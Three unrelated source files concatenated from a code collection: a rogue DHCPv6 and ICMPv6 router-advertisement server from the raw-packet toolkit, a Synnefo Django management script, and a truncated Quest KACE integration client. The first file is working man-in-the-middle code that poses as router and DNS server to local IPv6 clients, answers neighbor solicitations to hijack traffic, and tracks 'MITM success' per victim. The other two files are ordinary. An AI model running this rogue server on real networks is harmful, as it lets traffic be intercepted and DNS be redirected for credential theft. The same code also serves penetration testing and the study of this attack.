__license__ = 'MIT'
__version__ = '0.2.1'
__maintainer__ = 'Vladimir Ivanov'
__email__ = 'ivanov.vladimir.mail@gmail.com'
__status__ = 'Development'
# endregion
# region class DHCPv6Server
class DHCPv6Server:
# region Set properties
_base: Base = Base()
_utils: Utils = Utils()
_sniff: RawSniff = RawSniff()
_eth: RawEthernet = RawEthernet()
_icmpv6: RawICMPv6 = RawICMPv6()
_dhcpv6: RawDHCPv6 = RawDHCPv6()
_thread_manager: ThreadManager = ThreadManager(10)
_your: Dict[str, Union[None, str]] = {'network-interface': None, 'mac-address': None, 'ipv6-link-address': None}
_target: Dict[str, Union[None, str]] = {'mac-address': None, 'ipv6-address': None}
_clients: Dict[str, Dict[str, Union[bool, str]]] = dict()
_ipv6_prefix: str = 'fde4:8dba:82e1:ffff::/64'
_ipv6_prefix_address: str = 'fde4:8dba:82e1:ffff::'
_first_ipv6_address_suffix: int = 2
_last_ipv6_address_suffix: int = 65534
_domain_search: str = 'domain.local'
_solicit_packets_delay: float = 1
_disable_dhcpv6: bool = False
_exit_on_success: bool = False
_quiet: bool = True
# endregion
# region Init
def __init__(self, network_interface: str):
self._your = self._base.get_interface_settings(interface_name=network_interface,
required_parameters=['mac-address',
'ipv6-link-address'])
self._dns_server_ipv6_address: str = self._your['ipv6-link-address']
self._raw_send: RawSend = RawSend(network_interface=network_interface)
# endregion
# region Start DHCPv6 Server
def start(self,
target_mac_address: Union[None, str] = None,
target_ipv6_address: Union[None, str] = None,
first_ipv6_address_suffix: int = 2,
last_ipv6_address_suffix: int = 65534,
dns_server_ipv6_address: Union[None, str] = None,
ipv6_prefix: str = 'fde4:8dba:82e1:ffff::/64',
domain_search: str = 'domain.local',
disable_dhcpv6: bool = False,
exit_on_success: bool = False,
quiet: bool = False) -> None:
# region Set variables
self._ipv6_prefix: str = ipv6_prefix
self._ipv6_prefix_address: str = self._ipv6_prefix.split('/')[0]
self._disable_dhcpv6 = disable_dhcpv6
self._domain_search = domain_search
self._exit_on_success = exit_on_success
self._quiet = quiet
# endregion
# region Set target MAC and IPv6 address, if target IP is not set - get first and last suffix IPv6 address
# region Set target IPv6 address
if target_mac_address is not None:
self._target['mac-address'] = \
self._utils.check_mac_address(mac_address=target_mac_address,
parameter_name='target MAC address')
# endregion
# region Target IPv6 is set
if target_ipv6_address is not None:
assert target_mac_address is not None, \
'Please set target MAC address for target IPv6 address: ' + \
self._base.info_text(str(target_ipv6_address))
self._target['ipv6-address'] = \
self._utils.check_ipv6_address(network_interface=self._your['network-interface'],
ipv6_address=target_ipv6_address,
is_local_ipv6_address=False,
parameter_name='target IPv6 address')
self._clients[self._target['mac-address']] = {'advertise address': self._target['ipv6-address']}
# endregion
# region Target IPv6 is not set - get first and last suffix IPv6 address
else:
# Check first suffix IPv6 address
self._first_ipv6_address_suffix = \
self._utils.check_value_in_range(value=first_ipv6_address_suffix,
first_value=1,
last_value=65535,
parameter_name='first IPv6 address suffix')
# Check last suffix IPv6 address
self._last_ipv6_address_suffix = \
self._utils.check_value_in_range(value=last_ipv6_address_suffix,
first_value=self._first_ipv6_address_suffix,
last_value=65535,
parameter_name='last IPv6 address suffix')
# endregion
# endregion
# region Set recursive DNS server address
if dns_server_ipv6_address is not None:
self._dns_server_ipv6_address = \
self._utils.check_ipv6_address(network_interface=self._your['network-interface'],
ipv6_address=dns_server_ipv6_address,
is_local_ipv6_address=False,
parameter_name='DNS server IPv6 address',
check_your_ipv6_address=False)
# endregion
# region General output
if not self._quiet:
self._base.print_info('Network interface: ', self._your['network-interface'])
self._base.print_info('Your MAC address: ', self._your['mac-address'])
self._base.print_info('Your link local IPv6 address: ', self._your['ipv6-link-address'])
if self._target['mac-address'] is not None:
self._base.print_info('Target MAC address: ', self._target['mac-address'])
if self._target['ipv6-address'] is not None:
self._base.print_info('Target IPv6 address: ', self._target['ipv6-address'])
else:
self._base.print_info('First suffix offer IP: ', str(self._first_ipv6_address_suffix))
self._base.print_info('Last suffix offer IP: ', str(self._last_ipv6_address_suffix))
self._base.print_info('Prefix: ', self._ipv6_prefix)
self._base.print_info('Router IPv6 address: ', self._your['ipv6-link-address'])
self._base.print_info('DNS IPv6 address: ', self._dns_server_ipv6_address)
self._base.print_info('Domain search: ', self._domain_search)
# endregion
# region Send ICMPv6 advertise packets in other thread
self._thread_manager.add_task(self._send_icmpv6_advertise_packets)
# endregion
# region Add multicast MAC addresses on interface
self._add_multicast_mac_addresses()
# endregion
# region Start Sniffer
# region Print info message
self._base.print_info('Waiting for a ICMPv6 or DHCPv6 requests ...')
# endregion
# region Set sniff filters
sniff_filters: Dict = {'Ethernet': {'not-source': self._your['mac-address']},
'UDP': {'destination-port': 547, 'source-port': 546},
'ICMPv6': {'types': [133, 135]}}
scapy_lfilter: Any = lambda eth: eth.src != self._your['mac-address']
if self._target['mac-address'] is not None:
sniff_filters['Ethernet'] = {'source': self._target['mac-address']}
scapy_lfilter: Any = lambda eth: eth.src == self._target['mac-address']
# endregion
# region Start sniffer
self._sniff.start(protocols=['IPv6', 'UDP', 'ICMPv6', 'DHCPv6'], prn=self._reply,
filters=sniff_filters,
network_interface=self._your['network-interface'],
scapy_filter='icmp6 or (udp and (port 547 or 546))',
scapy_lfilter=scapy_lfilter)
# endregion
# endregion
# endregion
# region Add multicast MAC addresses on interface
def _add_multicast_mac_addresses(self):
self._base.add_multicast_mac_address(interface_name=self._your['network-interface'],
multicast_mac_address='33:33:00:00:00:02',
exit_on_failure=False,
quiet=self._quiet)
self._base.add_multicast_mac_address(interface_name=self._your['network-interface'],
multicast_mac_address='33:33:00:01:00:02',
exit_on_failure=False,
quiet=self._quiet)
# endregion
# region Add client info in global self._clients dictionary
def _add_client_info_in_dictionary(self,
client_mac_address: str,
client_info: Dict[str, Union[bool, str]],
this_client_already_in_dictionary: bool = False):
if this_client_already_in_dictionary:
self._clients[client_mac_address].update(client_info)
else:
self._clients[client_mac_address] = client_info
# endregion
# region Send ICMPv6 solicit packets
def _send_icmpv6_solicit_packets(self):
try:
while True:
icmpv6_solicit_packet = \
self._icmpv6.make_router_solicit_packet(ethernet_src_mac=self._your['mac-address'],
ipv6_src=self._your['ipv6-link-address'],
need_source_link_layer_address=True,
source_link_layer_address=self._eth.make_random_mac())
self._raw_send.send_packet(icmpv6_solicit_packet)
sleep(self._solicit_packets_delay)
except KeyboardInterrupt:
self._base.print_info('Exit')
exit(0)
# endregion
# region Send DHCPv6 solicit packets
def _send_dhcpv6_solicit_packets(self):
try:
while True:
request_options = [23, 24]
dhcpv6_solicit_packet = \
self._dhcpv6.make_solicit_packet(ethernet_src_mac=self._your['mac-address'],
ipv6_src=self._your['ipv6-link-address'],
transaction_id=randint(1, 16777215),
client_mac_address=self._eth.make_random_mac(),
option_request_list=request_options)
self._raw_send.send_packet(dhcpv6_solicit_packet)
sleep(self._solicit_packets_delay)
except KeyboardInterrupt:
self._base.print_info('Exit ....')
exit(0)
# endregion
# region Send ICMPv6 advertise packets
def _send_icmpv6_advertise_packets(self):
icmpv6_ra_packet = \
self._icmpv6.make_router_advertisement_packet(ethernet_src_mac=self._your['mac-address'],
ethernet_dst_mac='33:33:00:00:00:01',
ipv6_src=self._your['ipv6-link-address'],
ipv6_dst='ff02::1',
dns_address=self._dns_server_ipv6_address,
domain_search=self._domain_search,
prefix=self._ipv6_prefix,
router_lifetime=5000,
advertisement_interval=
int(self._solicit_packets_delay * 1000))
try:
while True:
self._raw_send.send_packet(icmpv6_ra_packet)
sleep(self._solicit_packets_delay)
except KeyboardInterrupt:
self._base.print_info('Exit')
exit(0)
# endregion
# region Reply to DHCPv6 and ICMPv6 requests
def _reply(self, packet):
# region Get client MAC address
client_mac_address: str = packet['Ethernet']['source']
# endregion
# region Check this client already in self._clients dictionary
client_already_in_dictionary: bool = False
if client_mac_address in self._clients.keys():
client_already_in_dictionary = True
# endregion
# region Check MiTM status for this client
self._check_mitm_status(client_mac_address=client_mac_address)
# endregion
# region ICMPv6
if 'ICMPv6' in packet.keys():
# region ICMPv6 Router Solicitation
if packet['ICMPv6']['type'] == 133:
# Make and send ICMPv6 router advertisement packet
icmpv6_ra_packet = \
self._icmpv6.make_router_advertisement_packet(ethernet_src_mac=self._your['mac-address'],
ethernet_dst_mac=packet['Ethernet']['source'],
ipv6_src=self._your['ipv6-link-address'],
ipv6_dst=packet['IPv6']['source-ip'],
dns_address=self._dns_server_ipv6_address,
domain_search=self._domain_search,
prefix=self._ipv6_prefix,
router_lifetime=5000)
self._raw_send.send_packet(icmpv6_ra_packet)
# Print info messages
self._base.print_info('ICMPv6 Router Solicitation request from: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')')
self._base.print_info('ICMPv6 Router Advertisement reply to: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')')
# Delete this client from global self._clients dictionary
try:
del self._clients[client_mac_address]
client_already_in_dictionary = False
except KeyError:
pass
# Add client info in global self._clients dictionary
self._add_client_info_in_dictionary(client_mac_address,
{'router solicitation': True,
'network prefix': self._ipv6_prefix},
client_already_in_dictionary)
# endregion
# region ICMPv6 Neighbor Solicitation
if packet['ICMPv6']['type'] == 135:
# region Get ICMPv6 Neighbor Solicitation target address
target_address: str = packet['ICMPv6']['target-address']
na_packet: Union[None, bytes] = None
if target_address.startswith('fe80::'):
if target_address == self._your['ipv6-link-address']:
self._add_client_info_in_dictionary(client_mac_address,
{'neighbor solicitation your address': True},
client_already_in_dictionary)
else:
na_packet = \
self._icmpv6.make_neighbor_advertisement_packet(ethernet_src_mac=self._your['mac-address'],
ipv6_src=self._your['ipv6-link-address'],
target_ipv6_address=target_address)
# endregion
# region Neighbor Solicitation target address is DNS server IPv6 address
if self._dns_server_ipv6_address != self._your['ipv6-link-address']:
if self._dns_server_ipv6_address.startswith(self._ipv6_prefix_address) or \
self._dns_server_ipv6_address.startswith('fe80::'):
if target_address == self._dns_server_ipv6_address:
self._add_client_info_in_dictionary(client_mac_address,
{'neighbor solicitation dns server address': True},
client_already_in_dictionary)
# endregion
# region Neighbor Solicitation target address not in your ipv6 prefix
if not target_address.startswith(self._ipv6_prefix_address) and na_packet is not None:
for _ in range(10):
self._raw_send.send_packet(na_packet)
# endregion
# region Neighbor Solicitation target address in your ipv6 prefix
else:
self._add_client_info_in_dictionary(client_mac_address,
{'neighbor solicitation in ipv6 prefix': True},
client_already_in_dictionary)
# endregion
# region DHCPv6 advertise address is set
# This client already in dictionary
if client_already_in_dictionary:
# Advertise address for this client is set
if 'advertise address' in self._clients[client_mac_address].keys():
# ICMPv6 Neighbor Solicitation target address is DHCPv6 advertise IPv6 address
if target_address == self._clients[client_mac_address]['advertise address']:
# Add client info in global self._clients dictionary
self._add_client_info_in_dictionary(client_mac_address,
{'neighbor solicitation advertise address': True},
client_already_in_dictionary)
# ICMPv6 Neighbor Solicitation target address is not DHCPv6 advertise IPv6 address
elif na_packet is not None:
for _ in range(10):
self._raw_send.send_packet(na_packet)
# endregion
# endregion
# endregion
# region DHCPv6
# Protocol DHCPv6 is enabled
if not self._disable_dhcpv6 and 'DHCPv6' in packet.keys():
# region Get Client identifier and Identity Association for Non-temporary Address
cid: Union[None, bytes] = None
iaid: Union[None, int] = None
for option in packet['DHCPv6']['options']:
if option['type'] == 1:
cid = option['value']['raw']
elif option['type'] == 3:
iaid = option['value']['iaid']
if cid is None or iaid is None:
self._base.print_info('Malformed DHCPv6 packet from: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')',
' XID: ', hex(packet['DHCPv6']['transaction-id']))
return
# endregion
# region DHCPv6 Solicit
if packet['DHCPv6']['message-type'] == 1:
# Set IPv6 address in advertise packet
try:
ipv6_address = self._clients[client_mac_address]['advertise address']
except KeyError:
if self._target['ipv6-address'] is not None:
ipv6_address = self._target['ipv6-address']
else:
ipv6_address = self._ipv6_prefix_address + \
format(randint(self._first_ipv6_address_suffix,
self._last_ipv6_address_suffix), 'x')
# Make and send DHCPv6 advertise packet
dhcpv6_advertise = \
self._dhcpv6.make_advertise_packet(ethernet_src_mac=self._your['mac-address'],
ethernet_dst_mac=packet['Ethernet']['source'],
ipv6_src=self._your['ipv6-link-address'],
ipv6_dst=packet['IPv6']['source-ip'],
transaction_id=packet['DHCPv6']['transaction-id'],
dns_address=self._dns_server_ipv6_address,
domain_search=self._domain_search,
ipv6_address=ipv6_address,
cid=cid, iaid=iaid, preference=255)
self._raw_send.send_packet(dhcpv6_advertise)
# Print info messages
self._base.print_info('DHCPv6 Solicit from: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')',
' XID: ', hex(packet['DHCPv6']['transaction-id']))
self._base.print_info('DHCPv6 Advertise to: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')',
' XID: ', hex(packet['DHCPv6']['transaction-id']),
' IAA: ', ipv6_address)
# Add client info in global self._clients dictionary
self._add_client_info_in_dictionary(client_mac_address,
{'dhcpv6 solicit': True,
'advertise address': ipv6_address},
client_already_in_dictionary)
# endregion
# region DHCPv6 Request
if packet['DHCPv6']['message-type'] == 3:
# Set DHCPv6 reply packet
dhcpv6_reply: Union[None, bytes] = None
# region Get Client DUID time, IPv6 address and Server MAC address
client_ipv6_address: Union[None, str] = None
server_mac_address: Union[None, str] = None
for dhcpv6_option in packet['DHCPv6']['options']:
if dhcpv6_option['type'] == 2:
server_mac_address = dhcpv6_option['value']['mac-address']
if dhcpv6_option['type'] == 3:
client_ipv6_address = dhcpv6_option['value']['ipv6-address']
# endregion
if server_mac_address is not None and client_ipv6_address is not None:
# Check Server MAC address
if server_mac_address != self._your['mac-address']:
self._add_client_info_in_dictionary(
client_mac_address,
{'dhcpv6 mitm': 'error: server mac address is not your mac address'},
client_already_in_dictionary)
else:
self._add_client_info_in_dictionary(
client_mac_address,
{'dhcpv6 mitm': 'success'},
client_already_in_dictionary)
try:
if client_ipv6_address == self._clients[client_mac_address]['advertise address']:
dhcpv6_reply = \
self._dhcpv6.make_reply_packet(ethernet_src_mac=self._your['mac-address'],
ethernet_dst_mac=packet['Ethernet']['source'],
ipv6_src=self._your['ipv6-link-address'],
ipv6_dst=packet['IPv6']['source-ip'],
transaction_id=packet['DHCPv6']['transaction-id'],
dns_address=self._dns_server_ipv6_address,
domain_search=self._domain_search,
ipv6_address=client_ipv6_address,
cid=cid)
self._raw_send.send_packet(dhcpv6_reply)
else:
self._add_client_info_in_dictionary(
client_mac_address,
{'dhcpv6 mitm': 'error: client request address is not advertise address'},
client_already_in_dictionary)
except KeyError:
self._add_client_info_in_dictionary(
client_mac_address,
{'dhcpv6 mitm': 'error: not found dhcpv6 solicit request for this client'},
client_already_in_dictionary)
# Print info messages
self._base.print_info('DHCPv6 Request from: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')',
' XID: ', hex(packet['DHCPv6']['transaction-id']),
' Server: ', server_mac_address,
' IAA: ', client_ipv6_address)
if dhcpv6_reply is not None:
self._base.print_info('DHCPv6 Reply to: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')',
' XID: ', hex(packet['DHCPv6']['transaction-id']),
' Server: ', server_mac_address,
' IAA: ', client_ipv6_address)
else:
if self._clients[client_mac_address]['dhcpv6 mitm'] == \
'error: server mac address is not your mac address':
self._base.print_error('Server MAC address in DHCPv6 Request is not your MAC address ' +
'for this client: ', client_mac_address)
if self._clients[client_mac_address]['dhcpv6 mitm'] == \
'error: client request address is not advertise address':
self._base.print_error('Client requested IPv6 address is not advertise IPv6 address ' +
'for this client: ', client_mac_address)
if self._clients[client_mac_address]['dhcpv6 mitm'] == \
'error: not found dhcpv6 solicit request for this client':
self._base.print_error('Could not found DHCPv6 solicit request ' +
'for this client: ', client_mac_address)
# endregion
# region DHCPv6 Release
if packet['DHCPv6']['message-type'] == 8:
# Print info message
self._base.print_info('DHCPv6 Release from: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')',
' XID: ', hex(packet['DHCPv6']['transaction-id']))
# Delete this client from global self._clients dictionary
try:
del self._clients[client_mac_address]
client_already_in_dictionary = False
except KeyError:
pass
# endregion
# region DHCPv6 Confirm
if packet['DHCPv6']['message-type'] == 4:
# region Get Client IPv6 address
client_ipv6_address: Union[None, str] = None
for dhcpv6_option in packet['DHCPv6']['options']:
if dhcpv6_option['type'] == 3:
client_ipv6_address = dhcpv6_option['value']['ipv6-address']
# endregion
# region Make and send DHCPv6 Reply packet
dhcpv6_reply = \
self._dhcpv6.make_reply_packet(ethernet_src_mac=self._your['mac-address'],
ethernet_dst_mac=packet['Ethernet']['source'],
ipv6_src=self._your['ipv6-link-address'],
ipv6_dst=packet['IPv6']['source-ip'],
transaction_id=packet['DHCPv6']['transaction-id'],
dns_address=self._dns_server_ipv6_address,
domain_search=self._domain_search,
ipv6_address=client_ipv6_address,
cid=cid)
self._raw_send.send_packet(dhcpv6_reply)
# endregion
# region Add Client info in global self._clients dictionary and print info message
self._add_client_info_in_dictionary(client_mac_address,
{'advertise address': client_ipv6_address,
'dhcpv6 mitm': 'success'},
client_already_in_dictionary)
self._base.print_info('DHCPv6 Confirm from: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')',
' XID: ', hex(packet['DHCPv6']['transaction-id']),
' IAA: ', client_ipv6_address)
self._base.print_info('DHCPv6 Reply to: ',
packet['IPv6']['source-ip'] + ' (' +
packet['Ethernet']['source'] + ')',
' XID: ', hex(packet['DHCPv6']['transaction-id']),
' IAA: ', client_ipv6_address)
# endregion
# endregion
# endregion
# endregion
# region Check MiTM Success
def _check_mitm_status(self, client_mac_address: str):
try:
if not self._disable_dhcpv6:
assert self._clients[client_mac_address]['dhcpv6 mitm'] == 'success'
# assert self._clients[client_mac_address]['neighbor solicitation advertise address']
else:
if self._dns_server_ipv6_address != self._your['ipv6-link-address']:
if self._dns_server_ipv6_address.startswith(self._ipv6_prefix_address) or \
self._dns_server_ipv6_address.startswith('fe80::'):
assert self._clients[client_mac_address]['neighbor solicitation dns server address']
assert self._clients[client_mac_address]['neighbor solicitation your address']
assert self._clients[client_mac_address]['neighbor solicitation in ipv6 prefix']
assert 'success message' not in self._clients[client_mac_address].keys()
self._base.print_success('MITM success: ',
self._clients[client_mac_address]['advertise address'] +
' (' + client_mac_address + ')')
if self._exit_on_success:
sleep(3)
exit(0)
else:
self._clients[client_mac_address].update({'success message': True})
return True
except KeyError:
return False
except AssertionError:
return False
# endregion
# endregion
|
Vladimir-Ivanov-Git/raw-packet
|
raw_packet/Servers/dhcpv6_server.py
|
Python
|
mit
| 34,064
|
# Copyright (C) 2010-2017 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import errno
import grp
import pwd
from django.core.management import ManagementUtility
from django.core import management
from synnefo.util.version import get_component_version
from logging.config import dictConfig
# monkey patch to show synnefo version instead of django version
management.get_version = lambda: get_component_version('webproject')
class SynnefoManagementUtility(ManagementUtility):
def main_help_text(self):
return ManagementUtility.main_help_text(self, commands_only=True)
def configure_logging():
try:
from synnefo.settings import SNF_MANAGE_LOGGING_SETUP
dictConfig(SNF_MANAGE_LOGGING_SETUP)
except ImportError:
import logging
logging.basicConfig()
log = logging.getLogger()
log.warning("SNF_MANAGE_LOGGING_SETUP setting missing.")
def get_uid(user):
if isinstance(user, int):
return user
elif user.isdigit():
return int(user)
else:
try:
return pwd.getpwnam(user).pw_uid
except KeyError:
raise Exception("No such user: '%s'" % user)
def get_gid(group):
if isinstance(group, int):
return group
elif group.isdigit():
return int(group)
else:
try:
return grp.getgrnam(group).gr_gid
except KeyError:
raise Exception("No such group: '%s'" % group)
def set_uid_gid(uid, gid):
if gid:
os.setgid(gid)
if uid:
username = None
try:
username = pwd.getpwuid(uid)[0]
except KeyError:
pass
# also set supplementary groups for the user
if username is not None:
if not gid:
gid = os.getgid()
try:
os.initgroups(username, gid)
except OSError, e:
if e.errno != errno.EPERM:
raise
os.setuid(uid)
def set_user_group():
from synnefo import settings
snf_user = getattr(settings, "SNF_MANAGE_USER", None)
snf_group = getattr(settings, "SNF_MANAGE_GROUP", None)
if snf_user is None:
raise Exception("`SNF_MANAGE_USER` setting not defined")
if snf_group is None:
raise Exception("`SNF_MANAGE_GROUP` setting not defined")
snf_uid = get_uid(snf_user)
snf_gid = get_gid(snf_group)
cur_uid = os.geteuid()
cur_gid = os.getegid()
if cur_uid != 0 and (cur_uid != snf_uid or cur_gid != snf_gid):
sys.stderr.write("snf-manage must be run as user root or as "
"`SNF_USER`:SNF_GROUP (%s:%s)\n" % (str(snf_user),
str(snf_group)))
if cur_uid == snf_uid:
return
set_uid_gid(snf_uid, snf_gid)
def main():
os.environ['DJANGO_SETTINGS_MODULE'] = \
os.environ.get('DJANGO_SETTINGS_MODULE', 'synnefo.settings')
set_user_group()
configure_logging()
mu = SynnefoManagementUtility(sys.argv)
mu.execute()
if __name__ == "__main__":
main()
|
grnet/synnefo
|
snf-webproject/synnefo/webproject/manage.py
|
Python
|
gpl-3.0
| 3,730
|
from typing import Dict, Optional, Tuple, Callable, Any, Union
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
import json
import requests
import dateparser
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
# key = field of a ticket , val = dict of (name,id) of options
TICKETS_OBJECTS = {
'impact': {
'1 person cannot work': 1,
'Many people cannot work': 2,
'1 person inconvenienced': 3,
'Many people inconvenienced': 4
},
'category': {
"Network": 1,
"Other": 2,
"Software": 4,
"Hardware": 3
},
'priority': {
"Medium": 1,
'High': 2,
'Low': 3
},
'status': {
'Opened': 1,
'Closed': 2,
'Need More Info': 3,
'New': 4,
'Reopened': 5,
'Waiting Overdue': 6,
'Waiting on Customer': 7,
'Waiting on Third Party': 8
}
}
def convert_snake_to_camel(snake_str: str) -> str:
"""Convert a specific string of snake case to camel case.
Args:
snake_str: The string that we would like to convert.
Returns:
converted string.
"""
snake_split = snake_str.split("_")
camel_string = "".join(map(str.capitalize, snake_split))
camel_string = convert_specific_keys(camel_string)
return camel_string
def convert_specific_keys(string: str):
"""
Convert specific keys to demisto standard
Args:
string: the text to transform
Returns:
A Demisto output standard string
"""
if string == 'OsName':
return 'OSName'
if string == 'OsNumber':
return 'OSNumber'
if string == 'Ram total':
return 'RamTotal'
if string == 'AssetDataId':
return 'AssetDataID'
if string == 'AssetClassId':
return 'AssetClassID'
if string == 'AssetStatusId':
return 'AssetStatusID'
if string == 'AssetTypeId':
return 'AssetTypeID'
if string == 'MappedId':
return 'MappedID'
if string == 'OwnerId':
return 'OwnerID'
if string == 'HdQueueId':
return 'HdQueueID'
if string == 'Ip':
return 'IP'
return string
def convert_dict_snake_to_camel(dic: dict) -> dict:
"""Convert a dictionary of snake case to camel case.
Args:
dic: The dictionary that we would like to convert.
Returns:
converted dictionary.
"""
context_dict = {}
for snake_str in dic:
if type(dic[snake_str]) is dict:
inner_dict = convert_dict_snake_to_camel(dic[snake_str])
camel = convert_snake_to_camel(snake_str)
context_dict[camel] = inner_dict
elif type(dic[snake_str]) is list:
inner_dict = parse_response(dic[snake_str])
camel = convert_snake_to_camel(snake_str)
context_dict[camel] = inner_dict
elif snake_str in ['id', 'Id']:
context_dict['ID'] = dic.get(snake_str, '')
else:
camel = convert_snake_to_camel(snake_str)
context_dict[camel] = dic.get(snake_str, '')
return context_dict
def parse_response(lst: list):
"""Convert a Api response to wanted format.
Args:
lst: A list of dictionaries that return from api call.
Returns:
converted list of dictionaries from snake case to camel case.
"""
list_res = []
for dic in lst:
context_dict = convert_dict_snake_to_camel(dic)
list_res.append(context_dict)
return list_res
class Client(BaseClient):
"""
Client to use in the integration, overrides BaseClient.
Used for communication with the api.
"""
def __init__(self, url: str, username: str, password: str, verify: bool, proxy: bool):
super().__init__(base_url=f"{url}/api", verify=verify, proxy=proxy)
self._url = url
self._username = username
self._password = password
self._token, self._cookie = self.get_token()
def get_token(self) -> Tuple[str, str]:
"""Get a token for the connection.
Returns:
token , cookie for the connection.
"""
token = ''
cookie = ''
data = {
"userName": self._username,
"password": self._password
}
login_url = f"{self._url}/ams/shared/api/security/login"
body = json.dumps(data)
headers = {'Content-Type': 'application/json'}
response = self.token_request(login_url, headers=headers, data=body)
# Extracting Token
response_cookies = response.get('cookies').__dict__.get('_cookies')
if response_cookies:
cookie_key = list(response_cookies.keys())[0]
if cookie_key:
ret_cookie = response_cookies.get(cookie_key).get("/")
cookie = self.get_cookie(ret_cookie)
token = ret_cookie.get("KACE_CSRF_TOKEN").__dict__.get('value')
if not token:
raise DemistoException("Could not get token")
if not cookie:
raise DemistoException("Could not get cookie")
return token, cookie
def update_token(self):
"""Update cookie and token.
Returns:
Tuple of token and cookie.
"""
self._token, self._cookie = self.get_token()
def get_cookie(self, res_cookie: dict) -> str:
"""Get a cookie from an cookie object in the needed format for the requests.
Args:
res_cookie: part of the response that the cookie is inside it.
Returns:
string that will be sent in the requests which represents the cookie in the header.
"""
KACE_CSRF_TOKEN = res_cookie.get("KACE_CSRF_TOKEN").__dict__.get('value')
x_dell_auth_jwt = res_cookie.get("x-dell-auth-jwt").__dict__.get('value')
kboxid = res_cookie.get("kboxid").__dict__.get('value')
KACE_LAST_USER_SECURE = res_cookie.get("KACE_LAST_USER_SECURE").__dict__.get('value')
KACE_LAST_ORG_SECURE = res_cookie.get("KACE_LAST_ORG_SECURE").__dict__.get('value')
cookie = f'KACE_LAST_USER_SECURE={KACE_LAST_USER_SECURE}; KACE_LAST_ORG_SECURE={KACE_LAST_ORG_SECURE};' \
f' kboxid={kboxid}; x-dell-auth-jwt={x_dell_auth_jwt}; KACE_CSRF_TOKEN={KACE_CSRF_TOKEN}'
return cookie
def token_request(self, url: str, headers: Optional[dict] = None, data: Optional[str] = None) -> dict:
"""login request for initiating a connection with the product.
Args:
url: full url that the request will be sent to.
headers: headers of the request.
data: data of the request which includes username and password.
Returns:
Dictionary of the response from the product.
"""
try:
response = requests.request("POST", url, headers=headers, data=data, verify=self._verify)
except requests.exceptions.SSLError:
err_msg = 'SSL Certificate Verification Failed - try selecting \'Trust any certificate\' checkbox in' \
' the integration configuration.'
raise DemistoException(err_msg)
except requests.exceptions.ConnectionError:
raise DemistoException("Invalid url , Failed to establish a connection")
if response.status_code == 401:
raise DemistoException("Error Code 401 - Invalid user or password")
return response.__dict__
def machines_list_request(self, filter_fields: Optional[str] = None):
"""List of machines.
Returns:
Response from API.
"""
headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie
}
url_suffix = '/inventory/machines'
if filter_fields:
url_suffix += f'?filtering={filter_fields}'
return self._http_request("GET", url_suffix=url_suffix, headers=headers)
def assets_list_request(self, filter_fields: Optional[str] = None) -> dict:
"""List of assets.
Returns:
Response from API.
"""
headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie
}
url_suffix = '/asset/assets'
if filter_fields:
url_suffix += f'?filtering={filter_fields}'
return self._http_request("GET", url_suffix=url_suffix, headers=headers)
def queues_list_request(self, filter_fields: Optional[str] = None) -> dict:
"""List of queues.
Returns:
Response from API.
"""
headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie
}
url_suffix = '/service_desk/queues?shaping=fields all'
if filter_fields:
url_suffix += f'&filtering={filter_fields}'
return self._http_request("GET", url_suffix=url_suffix, headers=headers)
def queues_list_fields_request(self, queue_number: str) -> dict:
"""List of fields in specific queue.
Args:
queue_number: queue nubmer for the request.
Returns:
Response from API.
"""
headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie
}
return self._http_request("GET", url_suffix=f"/service_desk/queues/{queue_number}/fields", headers=headers)
def tickets_list_request(self, shaping_fields: str = None, filter_fields: str = None) -> dict:
"""List of Tickets.
Args:
shaping_fields: str of the shaping that will be sent in the request.
filter_fields: str of filter that will be sent in the request.
Returns:
Response from API.
"""
if not shaping_fields:
shaping_fields = set_shaping(self)
self.update_token()
headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie
}
url_suffix = f"/service_desk/tickets?shaping={shaping_fields}"
if filter_fields:
url_suffix += f'&filtering={filter_fields}'
return self._http_request("GET", url_suffix=url_suffix, headers=headers)
def create_ticket_request(self, data: str) -> dict:
"""Create Ticket
Args:
data (str): the body of the request.
Returns:
Response from API.
"""
headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie,
'Content-Type': 'application/json'
}
return self._http_request("POST", url_suffix="/service_desk/tickets", headers=headers, data=data)
def update_ticket_request(self, ticket_id: str, data: str) -> dict:
"""Update Ticket.
Args:
ticket_id (str): ticket id that will be updated.
data (str): the body of the request.
Returns:
Response from API.
"""
headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie,
'Content-Type': 'application/json'
}
return self._http_request("POST", url_suffix=f"/service_desk/tickets/{ticket_id}", headers=headers, data=data)
def delete_ticket_request(self, ticket_id: str) -> dict:
"""Delete Ticket.
Args:
ticket_id (str): ticket id that will be deleted.
Returns:
Response from API.
"""
